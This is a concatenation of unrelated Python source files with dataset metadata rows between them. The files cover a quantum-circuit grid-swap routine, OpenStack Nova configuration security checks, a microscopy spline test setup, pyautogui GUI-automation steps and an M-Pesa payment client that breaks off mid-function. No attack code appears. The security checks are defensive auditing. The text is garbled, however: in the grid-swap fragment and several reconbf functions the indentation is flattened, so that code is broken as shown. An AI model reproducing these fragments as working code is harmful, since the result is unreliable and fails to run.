from src.topology.general.qubit import QubitHandler, QubitType
class GridSwap(LongDistanceAlgorithm):
def prepare(self, circuit, src, tgt, **kwargs):
path = self.find_shortest_path(circuit, src, tgt)
self.swap_path(circuit, path)
def teardown(self, circuit, src, tgt, **kwargs):
path = self.find_shortest_path(circuit, src, tgt)
self.swap_path(circuit, reversed(path))
def find_shortest_path(self, circuit, src, tgt):
        q = [[src]]
        visited = {src}
        while len(q) != 0:
            path = q.pop(0)
            cur = path[-1]
            if cur == tgt:
                return path
            for n in circuit.graph[cur]:
                if n in visited:
                    continue
                visited.add(n)
                new_path = list(path)
                new_path.append(n)
                q.append(new_path)
def swap_path(self, circuit, path):
prev = None
for i in path:
if prev is not None:
circuit.apply_two_qubit_gate(Swap, prev.name, i.name)
self.swap(prev, i)
prev = i
class GridCircuit(Circuit):
def __init__(self, engine, n, graph: dict = None, stats: Statistics = None, restrictions: Restrictions = None,
handlers: [QubitHandler] = None, ld_gate_algorithm=None):
super().__init__(graph=graph, stats=stats, restrictions=restrictions, handlers=handlers,
ld_gate_algorithm=ld_gate_algorithm)
self.create_grid(engine, ceil(sqrt(n)), ceil(n / sqrt(n)))
self.add_edges(ceil(sqrt(n)), ceil(n / sqrt(n)))
def create_grid(self, engine, x, y):
for idx in range(x):
for idy in range(y):
node = Node("log_" + str(idx) + "_" + str(idy), engine.allocate_qubit(), QubitType.LOGICAL,
restrictions=self.restrictions)
self.add_node(node)
def add_edges(self, x, y):
        for idx in range(0, x - 1):
            for idy in range(0, y):
                self.add_edge(self.node("log_" + str(idx) + "_" + str(idy)),
                              self.node("log_" + str(idx + 1) + "_" + str(idy)))
                self.add_edge(self.node("log_" + str(idx + 1) + "_" + str(idy)),
                              self.node("log_" + str(idx) + "_" + str(idy)))
        for idx in range(0, x):
            for idy in range(0, y - 1):
                self.add_edge(self.node("log_" + str(idx) + "_" + str(idy)),
                              self.node("log_" + str(idx) + "_" + str(idy + 1)))
                self.add_edge(self.node("log_" + str(idx) + "_" + str(idy + 1)),
                              self.node("log_" + str(idx) + "_" + str(idy)))
| true | true |
1c4a80ada0266eea6ace4af79ce1968081a0a12c | 5,578 | py | Python | reconbf/modules/test_nova.py | fallenpegasus/reconbf | bfd15bef549f011a3de885c3267d4f718223b798 | [
"Apache-2.0"
] | 45 | 2016-08-12T21:37:25.000Z | 2022-03-29T00:21:29.000Z | reconbf/modules/test_nova.py | fallenpegasus/reconbf | bfd15bef549f011a3de885c3267d4f718223b798 | [
"Apache-2.0"
] | 20 | 2016-08-11T07:42:28.000Z | 2016-09-09T13:33:47.000Z | reconbf/modules/test_nova.py | fallenpegasus/reconbf | bfd15bef549f011a3de885c3267d4f718223b798 | [
"Apache-2.0"
] | 6 | 2016-08-25T06:31:38.000Z | 2019-09-11T04:29:36.000Z | # Copyright 2016 Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from reconbf.lib import test_class
from reconbf.lib.result import GroupTestResult
from reconbf.lib.result import Result
from reconbf.lib.result import TestResult
from reconbf.lib import utils
import grp
import os
import pwd
def _conf_location():
return {'dir': '/etc/nova'}
def _conf_details():
config = _conf_location().copy()
config['user'] = 'root'
config['group'] = 'root'
return config
@test_class.explanation("""
Protection name: Config permissions
Check: Are nova config permissions ok
Purpose: Nova config files contain authentication
details and need to be protected. Ensure that
they're only available to the service.
""")
@test_class.set_mapping("OpenStack:Check-Compute-01",
"OpenStack:Check-Compute-02")
@test_class.takes_config(_conf_details)
def config_permission(config):
try:
user = pwd.getpwnam(config['user'])
except KeyError:
return TestResult(Result.SKIP,
'Could not find user "%s"' % config['user'])
try:
group = grp.getgrnam(config['group'])
except KeyError:
return TestResult(Result.SKIP,
'Could not find group "%s"' % config['group'])
result = GroupTestResult()
files = ['nova.conf', 'api-paste.ini', 'policy.json', 'rootwrap.conf']
for f in files:
path = os.path.join(config['dir'], f)
result.add_result(path,
utils.validate_permissions(path, 0o640, user.pw_uid,
group.gr_gid))
return result
@test_class.explanation("""
Protection name: Authentication strategy
Check: Make sure proper authentication is used
Purpose: There are multiple authentication backends
available. Nova should be configured to authenticate
against keystone rather than test backends.
""")
@test_class.set_mapping("OpenStack:Check-Compute-03")
@test_class.takes_config(_conf_location)
def nova_auth(config):
try:
path = os.path.join(config['dir'], 'nova.conf')
nova_conf = utils.parse_openstack_ini(path)
except EnvironmentError:
return TestResult(Result.SKIP, 'cannot read nova config files')
auth = nova_conf.get('DEFAULT', {}).get('auth_strategy', 'keystone')
if auth != 'keystone':
return TestResult(Result.FAIL,
'authentication should be done by keystone')
else:
return TestResult(Result.PASS)
@test_class.explanation("""
Protection name: Keystone api access
Check: Does Keystone access use secure connection
Purpose: OpenStack components communicate with each other
using various protocols and the communication might
involve sensitive / confidential data. An attacker may
try to eavesdrop on the channel in order to get access to
sensitive information. Thus all the components must
communicate with each other using a secured communication
protocol.
""")
@test_class.set_mapping("OpenStack:Check-Compute-04")
@test_class.takes_config(_conf_location)
def keystone_secure(config):
try:
path = os.path.join(config['dir'], 'nova.conf')
nova_conf = utils.parse_openstack_ini(path)
except EnvironmentError:
return TestResult(Result.SKIP, 'cannot read nova config files')
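    # Both the explicit auth_protocol and the scheme of identity_uri must be
    # HTTPS for the keystone channel to count as secure.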
protocol = nova_conf.get('keystone_authtoken', {}).get('auth_protocol',
'https')
identity = nova_conf.get('keystone_authtoken', {}).get('identity_uri',
'https:')
if not identity.startswith('https:'):
return TestResult(Result.FAIL, 'keystone access is not secure')
if protocol != 'https':
return TestResult(Result.FAIL, 'keystone access is not secure')
return TestResult(Result.PASS)
@test_class.explanation("""
Protection name: Glance api access
Check: Does Glance access use secure connection
Purpose: OpenStack components communicate with each other
using various protocols and the communication might
involve sensitive / confidential data. An attacker may
try to eavesdrop on the channel in order to get access to
sensitive information. Thus all the components must
communicate with each other using a secured communication
protocol.
""")
@test_class.set_mapping("OpenStack:Check-Compute-05")
@test_class.takes_config(_conf_location)
def glance_secure(config):
try:
path = os.path.join(config['dir'], 'nova.conf')
nova_conf = utils.parse_openstack_ini(path)
except EnvironmentError:
return TestResult(Result.SKIP, 'cannot read nova config files')
insecure = nova_conf.get('glance', {}).get(
'api_insecure', 'False').lower() == 'true'
if insecure:
return TestResult(Result.FAIL, 'glance access is not secure')
else:
return TestResult(Result.PASS)
| 34.645963 | 78 | 0.677483 |
from reconbf.lib import test_class
from reconbf.lib.result import GroupTestResult
from reconbf.lib.result import Result
from reconbf.lib.result import TestResult
from reconbf.lib import utils
import grp
import os
import pwd
def _conf_location():
return {'dir': '/etc/nova'}
def _conf_details():
config = _conf_location().copy()
config['user'] = 'root'
config['group'] = 'root'
return config
@test_class.explanation("""
Protection name: Config permissions
Check: Are nova config permissions ok
Purpose: Nova config files contain authentication
details and need to be protected. Ensure that
they're only available to the service.
""")
@test_class.set_mapping("OpenStack:Check-Compute-01",
"OpenStack:Check-Compute-02")
@test_class.takes_config(_conf_details)
def config_permission(config):
try:
user = pwd.getpwnam(config['user'])
except KeyError:
return TestResult(Result.SKIP,
'Could not find user "%s"' % config['user'])
try:
group = grp.getgrnam(config['group'])
except KeyError:
return TestResult(Result.SKIP,
'Could not find group "%s"' % config['group'])
result = GroupTestResult()
files = ['nova.conf', 'api-paste.ini', 'policy.json', 'rootwrap.conf']
for f in files:
path = os.path.join(config['dir'], f)
result.add_result(path,
utils.validate_permissions(path, 0o640, user.pw_uid,
group.gr_gid))
return result
@test_class.explanation("""
Protection name: Authentication strategy
Check: Make sure proper authentication is used
Purpose: There are multiple authentication backends
available. Nova should be configured to authenticate
against keystone rather than test backends.
""")
@test_class.set_mapping("OpenStack:Check-Compute-03")
@test_class.takes_config(_conf_location)
def nova_auth(config):
try:
path = os.path.join(config['dir'], 'nova.conf')
nova_conf = utils.parse_openstack_ini(path)
except EnvironmentError:
return TestResult(Result.SKIP, 'cannot read nova config files')
auth = nova_conf.get('DEFAULT', {}).get('auth_strategy', 'keystone')
if auth != 'keystone':
return TestResult(Result.FAIL,
'authentication should be done by keystone')
else:
return TestResult(Result.PASS)
@test_class.explanation("""
Protection name: Keystone api access
Check: Does Keystone access use secure connection
Purpose: OpenStack components communicate with each other
using various protocols and the communication might
involve sensitive / confidential data. An attacker may
try to eavesdrop on the channel in order to get access to
sensitive information. Thus all the components must
communicate with each other using a secured communication
protocol.
""")
@test_class.set_mapping("OpenStack:Check-Compute-04")
@test_class.takes_config(_conf_location)
def keystone_secure(config):
try:
path = os.path.join(config['dir'], 'nova.conf')
nova_conf = utils.parse_openstack_ini(path)
except EnvironmentError:
return TestResult(Result.SKIP, 'cannot read nova config files')
protocol = nova_conf.get('keystone_authtoken', {}).get('auth_protocol',
'https')
identity = nova_conf.get('keystone_authtoken', {}).get('identity_uri',
'https:')
if not identity.startswith('https:'):
return TestResult(Result.FAIL, 'keystone access is not secure')
if protocol != 'https':
return TestResult(Result.FAIL, 'keystone access is not secure')
return TestResult(Result.PASS)
@test_class.explanation("""
Protection name: Glance api access
Check: Does Glance access use secure connection
Purpose: OpenStack components communicate with each other
using various protocols and the communication might
involve sensitive / confidential data. An attacker may
try to eavesdrop on the channel in order to get access to
sensitive information. Thus all the components must
communicate with each other using a secured communication
protocol.
""")
@test_class.set_mapping("OpenStack:Check-Compute-05")
@test_class.takes_config(_conf_location)
def glance_secure(config):
try:
path = os.path.join(config['dir'], 'nova.conf')
nova_conf = utils.parse_openstack_ini(path)
except EnvironmentError:
return TestResult(Result.SKIP, 'cannot read nova config files')
insecure = nova_conf.get('glance', {}).get(
'api_insecure', 'False').lower() == 'true'
if insecure:
return TestResult(Result.FAIL, 'glance access is not secure')
else:
return TestResult(Result.PASS)
| true | true |
1c4a8104321bcc1796f75a2f5207296f38219830 | 674 | py | Python | 19th/sharing-taxi-fare/solution.py | WooJin1993/coding_test | ec9dc2dc768fe45700b4c0695b16535c0a824f6e | [
"MIT"
] | null | null | null | 19th/sharing-taxi-fare/solution.py | WooJin1993/coding_test | ec9dc2dc768fe45700b4c0695b16535c0a824f6e | [
"MIT"
] | null | null | null | 19th/sharing-taxi-fare/solution.py | WooJin1993/coding_test | ec9dc2dc768fe45700b4c0695b16535c0a824f6e | [
"MIT"
] | null | null | null | # Problem: https://programmers.co.kr/learn/courses/30/lessons/72413
# --- Solution ---
# With INF = sys.maxsize, one efficiency test case fails:
# computation time is also affected by the size of INF.
from itertools import product
def solution(n, s, a, b, fares):
result = []
INF = 1e12
graph = [[INF] * (n+1) for _ in range(n + 1)]
for i in range(1, n + 1):
graph[i][i] = 0
for c, d, f in fares:
graph[c][d] = graph[d][c] = f
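    # Floyd-Warshall all-pairs shortest paths.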
for k, i, j in product(range(1, n + 1), repeat=3):
graph[i][j] = min(graph[i][j], graph[i][k] + graph[k][j])
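    # Try every midpoint where the shared ride splits into two solo rides.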
for mid in range(1, n + 1):
result.append(graph[s][mid] + graph[mid][a] + graph[mid][b])
return min(result) | 25.923077 | 68 | 0.531157 |
from itertools import product
def solution(n, s, a, b, fares):
result = []
INF = 1e12
graph = [[INF] * (n+1) for _ in range(n + 1)]
for i in range(1, n + 1):
graph[i][i] = 0
for c, d, f in fares:
graph[c][d] = graph[d][c] = f
for k, i, j in product(range(1, n + 1), repeat=3):
graph[i][j] = min(graph[i][j], graph[i][k] + graph[k][j])
for mid in range(1, n + 1):
result.append(graph[s][mid] + graph[mid][a] + graph[mid][b])
return min(result) | true | true |
1c4a8168020be394142ebda10e6e5df8bb4b44fb | 6,210 | py | Python | storm_analysis/diagnostics/spliner_2d/configure.py | bintulab/storm-analysis | 71ae493cbd17ddb97938d0ae2032d97a0eaa76b2 | [
"CNRI-Python"
] | null | null | null | storm_analysis/diagnostics/spliner_2d/configure.py | bintulab/storm-analysis | 71ae493cbd17ddb97938d0ae2032d97a0eaa76b2 | [
"CNRI-Python"
] | null | null | null | storm_analysis/diagnostics/spliner_2d/configure.py | bintulab/storm-analysis | 71ae493cbd17ddb97938d0ae2032d97a0eaa76b2 | [
"CNRI-Python"
] | null | null | null | #!/usr/bin/env python
"""
Configure folder for Spliner testing.
Hazen 09/17
"""
import argparse
import inspect
import numpy
import os
import storm_analysis
import storm_analysis.sa_library.parameters as parameters
import storm_analysis.sa_library.sa_h5py as saH5Py
import storm_analysis.simulator.background as background
import storm_analysis.simulator.camera as camera
import storm_analysis.simulator.emitters_on_grid as emittersOnGrid
import storm_analysis.simulator.emitters_uniform_random as emittersUniformRandom
import storm_analysis.simulator.photophysics as photophysics
import storm_analysis.simulator.psf as psf
import storm_analysis.simulator.simulate as simulate
import storm_analysis.spliner.measure_psf as measurePSF
import storm_analysis.spliner.psf_to_spline as psfToSpline
import storm_analysis.diagnostics.spliner_2d.settings as settings
def testingParameters(cal_file = None):
"""
Create a Spliner parameters object.
"""
params = parameters.ParametersSpliner()
params.setAttr("max_frame", "int", -1)
params.setAttr("start_frame", "int", -1)
params.setAttr("background_sigma", "float", 8.0)
if cal_file is not None:
params.setAttr("camera_calibration", "filename", cal_file)
else:
params.setAttr("camera_gain", "float", settings.camera_gain)
params.setAttr("camera_offset", "float", settings.camera_offset)
params.setAttr("find_max_radius", "int", 5)
params.setAttr("iterations", "int", settings.iterations)
params.setAttr("no_fitting", "int", 0)
params.setAttr("pixel_size", "float", settings.pixel_size)
params.setAttr("sigma", "float", 1.5)
params.setAttr("spline", "filename", "psf.spline")
params.setAttr("threshold", "float", 6.0)
# Don't do tracking.
params.setAttr("descriptor", "string", "1")
params.setAttr("radius", "float", "0.0")
# Don't do drift-correction.
params.setAttr("d_scale", "int", 2)
params.setAttr("drift_correction", "int", 0)
params.setAttr("frame_step", "int", 500)
params.setAttr("z_correction", "int", 0)
# 'peak_locations' testing.
if hasattr(settings, "peak_locations") and (settings.peak_locations is not None):
params.setAttr("peak_locations", "filename", settings.peak_locations)
return params
def configure(no_splines, cal_file = None):
# Create sCMOS calibration file if requested.
#
if cal_file is not None:
offset = numpy.zeros((settings.y_size, settings.x_size)) + settings.camera_offset
variance = numpy.ones((settings.y_size, settings.x_size))
gain = numpy.ones((settings.y_size, settings.x_size)) * settings.camera_gain
rqe = numpy.ones((settings.y_size, settings.x_size))
numpy.save(cal_file, [offset, variance, gain, rqe, 2])
# Create parameters file for analysis.
#
print("Creating XML file.")
params = testingParameters(cal_file = cal_file)
params.toXMLFile("spliner.xml")
# Create localization on a grid file.
#
print("Creating gridded localization.")
emittersOnGrid.emittersOnGrid("grid_list.hdf5",
settings.nx,
settings.ny,
1.5,
20,
0.0,
0.0)
# Create randomly located localizations file.
#
print("Creating random localization.")
emittersUniformRandom.emittersUniformRandom("random_list.hdf5",
1.0,
settings.margin,
settings.x_size,
settings.y_size,
0.0)
# Create sparser grid for PSF measurement.
#
print("Creating data for PSF measurement.")
emittersOnGrid.emittersOnGrid("sparse_list.hdf5",
6,
3,
1.5,
40,
0.0,
0.0)
if no_splines:
return
# Create beads.txt file for spline measurement.
#
with saH5Py.SAH5Py("sparse_list.hdf5") as h5:
locs = h5.getLocalizations()
numpy.savetxt("beads.txt", numpy.transpose(numpy.vstack((locs['x'], locs['y']))))
# Create simulated data for PSF measurement.
#
bg_f = lambda s, x, y, i3 : background.UniformBackground(s, x, y, i3, photons = 10)
cam_f = lambda s, x, y, i3 : camera.Ideal(s, x, y, i3, 100.)
pp_f = lambda s, x, y, i3 : photophysics.AlwaysOn(s, x, y, i3, 20000.0)
psf_f = lambda s, x, y, i3 : psf.GaussianPSF(s, x, y, i3, settings.pixel_size)
sim = simulate.Simulate(background_factory = bg_f,
camera_factory = cam_f,
photophysics_factory = pp_f,
psf_factory = psf_f,
dither = True,
x_size = settings.x_size,
y_size = settings.y_size)
sim.simulate("spline_2d.tif", "sparse_list.hdf5", 5)
# Measure the PSF.
#
print("Measuring PSF.")
psf_name = "psf.psf"
measurePSF.measurePSF("spline_2d.tif",
"na",
"sparse_list.hdf5",
psf_name,
want2d = True,
aoi_size = int(settings.spline_size + 1),
pixel_size = settings.pixel_size * 1.0e-3)
# Measure the Spline.
#
if True:
print("Measuring Spline.")
psfToSpline.psfToSpline(psf_name, "psf.spline", settings.spline_size)
if (__name__ == "__main__"):
parser = argparse.ArgumentParser(description = 'Spline diagnostics configuration.')
parser.add_argument('--no-splines', dest='no_splines', action='store_true', default = False)
args = parser.parse_args()
configure(args.no_splines)
| 35.689655 | 96 | 0.585829 | import argparse
import inspect
import numpy
import os
import storm_analysis
import storm_analysis.sa_library.parameters as parameters
import storm_analysis.sa_library.sa_h5py as saH5Py
import storm_analysis.simulator.background as background
import storm_analysis.simulator.camera as camera
import storm_analysis.simulator.emitters_on_grid as emittersOnGrid
import storm_analysis.simulator.emitters_uniform_random as emittersUniformRandom
import storm_analysis.simulator.photophysics as photophysics
import storm_analysis.simulator.psf as psf
import storm_analysis.simulator.simulate as simulate
import storm_analysis.spliner.measure_psf as measurePSF
import storm_analysis.spliner.psf_to_spline as psfToSpline
import storm_analysis.diagnostics.spliner_2d.settings as settings
def testingParameters(cal_file = None):
params = parameters.ParametersSpliner()
params.setAttr("max_frame", "int", -1)
params.setAttr("start_frame", "int", -1)
params.setAttr("background_sigma", "float", 8.0)
if cal_file is not None:
params.setAttr("camera_calibration", "filename", cal_file)
else:
params.setAttr("camera_gain", "float", settings.camera_gain)
params.setAttr("camera_offset", "float", settings.camera_offset)
params.setAttr("find_max_radius", "int", 5)
params.setAttr("iterations", "int", settings.iterations)
params.setAttr("no_fitting", "int", 0)
params.setAttr("pixel_size", "float", settings.pixel_size)
params.setAttr("sigma", "float", 1.5)
params.setAttr("spline", "filename", "psf.spline")
params.setAttr("threshold", "float", 6.0)
params.setAttr("descriptor", "string", "1")
params.setAttr("radius", "float", "0.0")
# Don't do drift-correction.
params.setAttr("d_scale", "int", 2)
params.setAttr("drift_correction", "int", 0)
params.setAttr("frame_step", "int", 500)
params.setAttr("z_correction", "int", 0)
if hasattr(settings, "peak_locations") and (settings.peak_locations is not None):
params.setAttr("peak_locations", "filename", settings.peak_locations)
return params
def configure(no_splines, cal_file = None):
if cal_file is not None:
offset = numpy.zeros((settings.y_size, settings.x_size)) + settings.camera_offset
variance = numpy.ones((settings.y_size, settings.x_size))
gain = numpy.ones((settings.y_size, settings.x_size)) * settings.camera_gain
rqe = numpy.ones((settings.y_size, settings.x_size))
numpy.save(cal_file, [offset, variance, gain, rqe, 2])
print("Creating XML file.")
params = testingParameters(cal_file = cal_file)
params.toXMLFile("spliner.xml")
print("Creating gridded localization.")
emittersOnGrid.emittersOnGrid("grid_list.hdf5",
settings.nx,
settings.ny,
1.5,
20,
0.0,
0.0)
print("Creating random localization.")
emittersUniformRandom.emittersUniformRandom("random_list.hdf5",
1.0,
settings.margin,
settings.x_size,
settings.y_size,
0.0)
print("Creating data for PSF measurement.")
emittersOnGrid.emittersOnGrid("sparse_list.hdf5",
6,
3,
1.5,
40,
0.0,
0.0)
if no_splines:
return
with saH5Py.SAH5Py("sparse_list.hdf5") as h5:
locs = h5.getLocalizations()
numpy.savetxt("beads.txt", numpy.transpose(numpy.vstack((locs['x'], locs['y']))))
bg_f = lambda s, x, y, i3 : background.UniformBackground(s, x, y, i3, photons = 10)
cam_f = lambda s, x, y, i3 : camera.Ideal(s, x, y, i3, 100.)
pp_f = lambda s, x, y, i3 : photophysics.AlwaysOn(s, x, y, i3, 20000.0)
psf_f = lambda s, x, y, i3 : psf.GaussianPSF(s, x, y, i3, settings.pixel_size)
sim = simulate.Simulate(background_factory = bg_f,
camera_factory = cam_f,
photophysics_factory = pp_f,
psf_factory = psf_f,
dither = True,
x_size = settings.x_size,
y_size = settings.y_size)
sim.simulate("spline_2d.tif", "sparse_list.hdf5", 5)
print("Measuring PSF.")
psf_name = "psf.psf"
measurePSF.measurePSF("spline_2d.tif",
"na",
"sparse_list.hdf5",
psf_name,
want2d = True,
aoi_size = int(settings.spline_size + 1),
pixel_size = settings.pixel_size * 1.0e-3)
if True:
print("Measuring Spline.")
psfToSpline.psfToSpline(psf_name, "psf.spline", settings.spline_size)
if (__name__ == "__main__"):
parser = argparse.ArgumentParser(description = 'Spline diagnostics configuration.')
parser.add_argument('--no-splines', dest='no_splines', action='store_true', default = False)
args = parser.parse_args()
configure(args.no_splines)
| true | true |
1c4a82c3e3b8ab680786c7cb5945c0ac48353bc2 | 5,065 | py | Python | GUIMonkey/Steps.py | Setyadjih/GUIMonkey | b1299663ee84de688663c08040d3411c78fb7fe1 | [
"MIT"
] | null | null | null | GUIMonkey/Steps.py | Setyadjih/GUIMonkey | b1299663ee84de688663c08040d3411c78fb7fe1 | [
"MIT"
] | 7 | 2021-04-27T03:39:32.000Z | 2021-09-03T05:31:38.000Z | GUIMonkey/Steps.py | Setyadjih/GUIMonkey | b1299663ee84de688663c08040d3411c78fb7fe1 | [
"MIT"
] | null | null | null | import time
from abc import ABC, abstractmethod
import pyautogui
from lib.logger import get_logger
class StepBase(ABC):
"""Base class for steps. We mainly want the execute interface"""
@abstractmethod
def __init__(self, step_name: str = None, logger=None):
self.name = step_name if step_name else self.__class__.__name__
self.data = dict()
self.flags = {
# Require Flags
"require": False,
"require_key": None,
# output Flags
"output": False,
"output_key": None,
}
self.logger = logger if logger else get_logger(self.name)
@abstractmethod
def execute(self):
self.logger.debug(f"Executing {self.name}...")
# TODO: This system seems fragile. How should in and out data be handled?
def require_data(self, require_bool=False, require_key=None):
self.flags["require"] = require_bool
self.flags["require_key"] = require_key
self.data[require_key] = None
def output_data(self, pass_bool=False, output_key=None):
self.flags["output"] = pass_bool
self.flags["output_key"] = output_key
self.data[output_key] = None
class KeyPress(StepBase):
def __init__(self, key, mod=None, step_name=None, logger=None):
super(KeyPress, self).__init__(step_name, logger)
self.key = key
self.mod = mod
def execute(self):
super(KeyPress, self).execute()
if self.mod:
pyautogui.keyDown(self.mod)
pyautogui.press(self.key)
pyautogui.keyUp(self.mod)
else:
pyautogui.press(self.key)
class WaitForImage(StepBase):
def __init__(self, image, timeout=30, step_name=None, logger=None):
super(WaitForImage, self).__init__(step_name, logger)
self.timeout = timeout
self.require_data(True, "image")
self.output_data(True, "image_loc")
self.data["image"] = image
def execute(self):
super(WaitForImage, self).execute()
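        # Poll the screen every few seconds until the image appears or the
        # timeout elapses.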
start = time.time()
current = time.time()
while current - start < self.timeout:
time.sleep(3)
image = self.data["image"]
image_loc = pyautogui.locateCenterOnScreen(image, confidence=0.9)
if image_loc:
self.logger.debug("Found!")
self.data["image_loc"] = image_loc
return
else:
current = time.time()
self.logger.debug(f"Did not find image...{int(current - start)}/{self.timeout}")
self.logger.warning("Search timed out, returning...")
return
class Delay(StepBase):
def __init__(self, delay=0.5, step_name=None, logger=None):
super(Delay, self).__init__(step_name, logger)
self.delay = delay
def execute(self):
super(Delay, self).execute()
time.sleep(self.delay)
class MoveToButton(StepBase):
def __init__(self, button, step_name=None, logger=None):
super(MoveToButton, self).__init__(step_name, logger)
self.button = button
def execute(self):
super(MoveToButton, self).execute()
button_loc = pyautogui.locateCenterOnScreen(self.button, confidence=0.9)
pyautogui.moveTo(button_loc[0], button_loc[1])
class ClickOnButton(StepBase):
def __init__(self, button, click_num=1, step_name=None, logger=None):
super(ClickOnButton, self).__init__(step_name, logger)
self.require_data(True, "image_loc")
self.button = button
self.click_num = click_num
def execute(self):
super(ClickOnButton, self).execute()
button = pyautogui.locateCenterOnScreen(self.button, confidence=0.9)
for i in range(self.click_num):
pyautogui.click(button[0], button[1])
class Write(StepBase):
def __init__(self, text, enter=False, step_name=None, logger=None):
super(Write, self).__init__(step_name, logger)
self.text = text
self.enter = enter
def execute(self):
super(Write, self).execute()
pyautogui.write(self.text)
if self.enter:
pyautogui.press("enter")
class WaitForLoading(StepBase):
def __init__(self, loading_image, trigger_max=3, step_name=None, logger=None):
super(WaitForLoading, self).__init__(step_name, logger)
self.loading_image = loading_image
self.trigger_max = trigger_max
def execute(self):
super(WaitForLoading, self).execute()
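        # Only declare loading finished after trigger_max consecutive polls
        # miss the loading indicator.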
trigger = 0
while trigger < self.trigger_max:
            load1 = pyautogui.locateCenterOnScreen(self.loading_image, confidence=0.9)
if load1:
self.logger.debug("found loading, waiting...")
trigger = 0
pyautogui.moveTo(load1)
time.sleep(3)
else:
trigger += 1
time.sleep(1)
self.logger.debug(f"Did not find loading, triggering ({trigger} / " f"{self.trigger_max})")
| 31.855346 | 107 | 0.615597 | true | true |
1c4a847fa05d25e7f265a374d27586576fb10671 | 255 | py | Python | aux/engine/actor/__init__.py | bischjer/auxiliary | e42d8a4af43c9bd4d816c03edc2465640635b46b | [
"BSD-3-Clause"
] | null | null | null | aux/engine/actor/__init__.py | bischjer/auxiliary | e42d8a4af43c9bd4d816c03edc2465640635b46b | [
"BSD-3-Clause"
] | null | null | null | aux/engine/actor/__init__.py | bischjer/auxiliary | e42d8a4af43c9bd4d816c03edc2465640635b46b | [
"BSD-3-Clause"
] | null | null | null |
from aux.engine.actor.reactor import Reactor
from aux.engine.actor.proactor import Proactor
from aux.engine.actor.coactor import Coactor
__all__ = ['Reactor',
'Proactor',
'Coactor']
class NoActorFoundError(Exception):
    pass
| 23.181818 | 46 | 0.705882 | true | true |
1c4a849524c22465abea1613bfe918c2849cddd4 | 233 | py | Python | nni/retiarii/trainer/pytorch/__init__.py | qfyin/nni | 59a1ccf8eba68b94974e84fc3834f38d851faf89 | [
"MIT"
] | 3 | 2021-02-23T14:01:43.000Z | 2021-03-29T16:19:32.000Z | nni/retiarii/trainer/pytorch/__init__.py | qfyin/nni | 59a1ccf8eba68b94974e84fc3834f38d851faf89 | [
"MIT"
] | 1 | 2021-01-17T08:53:56.000Z | 2021-01-17T08:53:56.000Z | nni/retiarii/trainer/pytorch/__init__.py | qfyin/nni | 59a1ccf8eba68b94974e84fc3834f38d851faf89 | [
"MIT"
] | 1 | 2020-12-21T11:15:54.000Z | 2020-12-21T11:15:54.000Z |
from .base import PyTorchImageClassificationTrainer, PyTorchMultiModelTrainer
from .darts import DartsTrainer
from .enas import EnasTrainer
from .proxyless import ProxylessTrainer
from .random import RandomTrainer, SinglePathTrainer
| 38.833333 | 77 | 0.875536 | true | true |
1c4a84b409b74bb514cb2f6f68ddd6f1e2431fe6 | 5,524 | py | Python | build/lib/mpesa/api/mpesa_express.py | Arlus/python-mpesa | 4113d9a59211c05f4c6881965710c4f67a5157b2 | [
"MIT"
] | 26 | 2018-08-02T06:59:50.000Z | 2022-01-15T16:46:39.000Z | build/lib/mpesa/api/mpesa_express.py | Arlus/python-mpesa | 4113d9a59211c05f4c6881965710c4f67a5157b2 | [
"MIT"
] | 1 | 2019-08-17T08:52:23.000Z | 2019-08-17T08:52:23.000Z | build/lib/mpesa/api/mpesa_express.py | Arlus/python-mpesa | 4113d9a59211c05f4c6881965710c4f67a5157b2 | [
"MIT"
] | 38 | 2018-07-26T18:11:18.000Z | 2022-01-02T10:10:54.000Z |
import base64
import requests
from .auth import MpesaBase
import datetime
class MpesaExpress(MpesaBase):
def __init__(self, env="sandbox", app_key=None, app_secret=None, sandbox_url=None, live_url=None):
MpesaBase.__init__(self, env, app_key, app_secret, sandbox_url, live_url)
self.authentication_token = self.authenticate()
def stk_push(self, business_shortcode=None, passcode=None, amount=None, callback_url=None, reference_code=None,
phone_number=None, description=None):
"""This method uses Mpesa's Express API to initiate online payment on behalf of a customer..
**Args:**
- business_shortcode (int): The short code of the organization.
- passcode (str): Get from developer portal
- amount (int): The amount being transacted
- callback_url (str): A CallBack URL is a valid secure URL that is used to receive notifications from M-Pesa API.
- reference_code: Account Reference: This is an Alpha-Numeric parameter that is defined by your system as an Identifier of the transaction for CustomerPayBillOnline transaction type.
- phone_number: The Mobile Number to receive the STK Pin Prompt.
- description: This is any additional information/comment that can be sent along with the request from your system. MAX 13 characters
**Returns:**
- CustomerMessage (str):
- CheckoutRequestID (str):
- ResponseDescription (str):
- MerchantRequestID (str):
- ResponseCode (str):
"""
time = str(datetime.datetime.now()).split(".")[0].replace("-", "").replace(" ", "").replace(":", "")
password = "{0}{1}{2}".format(str(business_shortcode), str(passcode), time)
        # b64encode needs bytes under Python 3; encode the input and decode the result
        encoded = base64.b64encode(password.encode()).decode()
payload = {
"BusinessShortCode": business_shortcode,
"Password": encoded,
"Timestamp": time,
"TransactionType": "CustomerPayBillOnline",
"Amount": amount,
"PartyA": int(phone_number),
"PartyB": business_shortcode,
"PhoneNumber": int(phone_number),
"CallBackURL": callback_url,
"AccountReference": reference_code,
"TransactionDesc": description
}
headers = {'Authorization': 'Bearer {0}'.format(self.authentication_token), 'Content-Type': "application/json"}
if self.env == "production":
base_safaricom_url = self.live_url
else:
base_safaricom_url = self.sandbox_url
saf_url = "{0}{1}".format(base_safaricom_url, "/mpesa/stkpush/v1/processrequest")
r = requests.post(saf_url, headers=headers, json=payload)
return r.json()
def query(self, business_shortcode=None, checkout_request_id=None, passcode=None):
"""This method uses Mpesa's Express API to check the status of a Lipa Na M-Pesa Online Payment..
**Args:**
- business_shortcode (int): This is organizations shortcode (Paybill or Buygoods - A 5 to 6 digit account number) used to identify an organization and receive the transaction.
- checkout_request_id (str): This is a global unique identifier of the processed checkout transaction request.
- passcode (str): Get from developer portal
**Returns:**
- CustomerMessage (str):
- CheckoutRequestID (str):
- ResponseDescription (str):
- MerchantRequestID (str):
- ResponseCode (str):
"""
time = str(datetime.datetime.now()).split(".")[0].replace("-", "").replace(" ", "").replace(":", "")
password = "{0}{1}{2}".format(str(business_shortcode), str(passcode), time)
